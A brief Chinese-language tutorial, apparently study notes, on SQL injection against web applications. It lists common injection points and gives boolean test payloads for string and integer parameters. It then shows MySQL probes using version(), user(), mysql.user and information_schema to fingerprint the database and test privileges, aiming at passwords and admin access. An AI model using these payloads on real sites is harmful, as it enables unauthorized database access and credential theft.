1.常用注入点在哪里?
1.常用注入点
A.表单中的输入域
B.URL的参数
C.Cookie或者隐藏域#### 2.如何发现注入点?
1.表单中的输入域,Cookie或者隐藏域
需要对网页输入输出机制进行充分的分析、过滤和提取,并了解其执行注入SQL的可能机制,比如输入field,cookie,url参数的变量名是什么,如何传递给数据库引擎。
2.URL的参数
字符类型参数:单引号’或双引号测试是否可以闭合
‘ and ‘1’=’1 不变逻辑,测试网页或者程序显示正确
‘ and ‘1’=’2 空集逻辑,测试网页或者程序显示不正确或者报错
‘ or ‘1’=’1 全集逻辑,测试网页对数据量的处理是否变化
整数类型参数:
and 1=1 不变逻辑,测试网页或者程序显示正确
and 1=2 空集逻辑,测试网页或者程序显示不正确或者报错
or 1=1 全集逻辑,测试网页对数据量的处理是否变化#### 3.探子回报应用–数据类型确认
数据类型确认:Version()
网页注入测试:and substring(version(),1,1)=5
返回正确说明:
1.数据库为mysql
2.对执行数据库函数未过滤
3.对括号未过滤
4.可能对子查询未过滤
5.可注入复杂逻辑
6.评估注入可进行的程度#### 4.探子回报应用–用户权限级别确认
用户权限级别确认: user()
网页注入测试:and (select length(user()) from mysql.user where user like ‘z%’)>1
返回正确说明:
1.对mysql字典数据库有权限,否则无权限。
如无权限,则对密码获取受限,必须另想它法,如web网站后台
管理员密码。
2.如对mysql字典库无权限,则需要测试对information_schema字典库测试权限
and (select count(*) from information_schema.tables where table_schema=database())>1
返回正确则说明,对information_schema字典库有权限,可以获取所有数据库、所有表、所有字典信息。对攻破web后台管理员权限有帮助。